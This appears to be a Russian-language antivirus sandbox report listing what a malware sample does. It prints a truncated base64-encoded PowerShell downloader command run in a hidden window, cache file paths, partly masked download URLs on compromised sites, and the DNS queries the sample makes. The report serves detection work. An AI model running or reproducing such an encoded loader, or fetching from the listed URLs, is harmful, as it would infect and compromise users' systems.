Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABZAFEAUQBVAFUAcABkAGsAPQAnAEcAUQBJAFUASQBuAHYAbwAnADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAIgBTAGUAQwBVAFIASQBgAFQAeQBQAHIATwBgAFQATwBgAGMATwBsACIAIAA9AC...
- %WINDIR%\serviceprofiles\networkservice\appdata\locallow\microsoft\cryptneturlcache\metadata\f0accf77cdcbff39f6191887f6d2d357
- %WINDIR%\serviceprofiles\networkservice\appdata\locallow\microsoft\cryptneturlcache\content\f0accf77cdcbff39f6191887f6d2d357
- http://vf##265.org/wp-includes/fjkpboVUN/
- http://www.vf##265.org/wp-includes/fjkpboVUN/
- http://fa###nime.com/wp-content/ADk6n8jm61/
- http://www.pr###ntwoo.com/18632/4Mv8Km8guspb0133/
- http://jo####done.co.uk/wp-includes/NILXqD/
- DNS ASK vf##265.org
- DNS ASK fa###nime.com
- DNS ASK pr###ntwoo.com
- DNS ASK aa####ssikka.com
- DNS ASK jo####done.co.uk
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABZAFEAUQBVAFUAcABkAGsAPQAnAEcAUQBJAFUASQBuAHYAbwAnADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAIgBTAGUAQwBVAFIASQBgAFQAeQBQAHIATwBgAFQATwBgAGMATwBsACIAIAA9AC...' (со скрытым окном)